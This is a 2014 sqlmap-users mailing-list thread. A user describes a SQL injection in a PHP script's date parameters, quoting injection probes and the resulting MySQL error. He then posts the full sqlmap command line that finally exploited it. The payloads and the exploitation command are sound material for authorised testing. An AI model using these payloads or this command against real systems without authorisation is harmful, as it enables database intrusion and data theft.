My full options list was this to successfully exploit the sqli vectors, for future reference:
./sqlmap.py -r /tmp/req.req --level=5 --risk=3 -o --dbms=mysql --force-ssl --tamper=between --drop-set-cookie --text-only On Sun, Mar 30, 2014 at 9:24 AM, Miroslav Stampar < miroslav.stam...@gmail.com> wrote: > Always happy when issues are resolved by themselves :) > > Bye > > > On Sun, Mar 30, 2014 at 4:01 PM, Brandon Perry > <bperry.volat...@gmail.com>wrote: > >> Oh, it looks like I am an idiot, this was supposed to be over SSL, but I >> was not passing --force-ssl. >> >> Sorry for the spam. >> >> >> On Sun, Mar 30, 2014 at 8:49 AM, Brandon Perry <bperry.volat...@gmail.com >> > wrote: >> >>> FWIW --parse-errors also doesn't seem to affect the output during a scan >>> on the URL. >>> >>> >>> On Sun, Mar 30, 2014 at 8:33 AM, Brandon Perry < >>> bperry.volat...@gmail.com> wrote: >>> >>>> Hi, >>>> >>>> I am playing around with an interesting SQL injection. A GET to a php >>>> script with two params (date1 and date2) will generate a PNG when >>>> successful, but will output a textual error message when, say , an >>>> apostrophe is thrown in one of the dates. >>>> >>>> >>>> For instance, GET fdsa.php?date1=2014-02-28&date2=2014-03-30 will >>>> result in a PNG. >>>> >>>> >>>> GET fdsa.php?date1=2014-02-28&date2=2014-03-30' (note apostrophe in >>>> last param) will yield: >>>> >>>> You have an error in your SQL syntax; check the manual that corresponds >>>> to your MySQL server version for the right syntax to use near 'admin' AND >>>> a.sid=i.sid and i.ref IN (SELECT ref from >>>> Itablet)' at line 4 >>>> >>>> >>>> GET fdsa.php?date1=2014-02-28&date1=2014-03-30'+and+'1'='1 will result >>>> in a PNG >>>> >>>> >>>> Since the result of a successful query is a PNG, I only expect to be >>>> able to use an error-based, or boolean/time-based attacks. However, sqlmap >>>> doesn't detect that either of the params are injectable (both are). >>>> >>>> [06:04:13] [WARNING] GET parameter 'date1' does not appear dynamic >>>> [06:04:13] [WARNING] heuristic (basic) test shows that GET parameter >>>> 'date1' might not be injectable >>>> >>>> >>>> I have tried using --text-only and am not using -o, but to no avail. >>>> Any thoughts on some tricks I can try to see if sqlmap will be able to >>>> exploit the injection points? >>>> >>>> I can send a traffic file if that helps. Currently on latest. >>>> >>>> bperry@ubuntu:~/tools/sqlmap$ git pull >>>> Already up-to-date. >>>> bperry@ubuntu:~/tools/sqlmap$ >>>> >>>> >>>> -- >>>> http://volatile-minds.blogspot.com -- blog >>>> http://www.volatileminds.net -- website >>>> >>> >>> >>> >>> -- >>> http://volatile-minds.blogspot.com -- blog >>> http://www.volatileminds.net -- website >>> >> >> >> >> -- >> http://volatile-minds.blogspot.com -- blog >> http://www.volatileminds.net -- website >> >> >> ------------------------------------------------------------------------------ >> >> _______________________________________________ >> sqlmap-users mailing list >> sqlmap-users@lists.sourceforge.net >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website
------------------------------------------------------------------------------
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
